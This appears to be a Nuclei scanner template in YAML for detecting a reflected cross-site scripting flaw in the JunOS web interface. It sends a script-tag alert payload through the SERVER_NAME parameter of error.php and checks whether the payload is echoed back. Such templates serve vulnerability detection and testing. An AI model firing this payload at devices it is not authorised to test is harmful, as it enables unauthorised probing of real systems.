35 lines
941 B
YAML
35 lines
941 B
YAML
|
id: junos-web-xss
|
||
|
|
||
|
info:
|
||
|
name: JunOS Web - Cross-Site Scripting
|
||
|
author: EvergreenCartoons
|
||
|
severity: high
|
||
|
description: JunOS contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
|
||
|
reference:
|
||
|
- https://octagon.net/blog/2022/10/28/juniper-sslvpn-junos-rce-and-multiple-vulnerabilities/
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 7.2
|
||
|
cwe-id: CWE-79
|
||
|
tags: xss,juniper,junos
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/error.php?SERVER_NAME=<script>alert(/xss/)</script>'
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- "<script>alert(/xss/)</script>"
|
||
|
part: body
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- "text/html"
|
||
|
part: header
|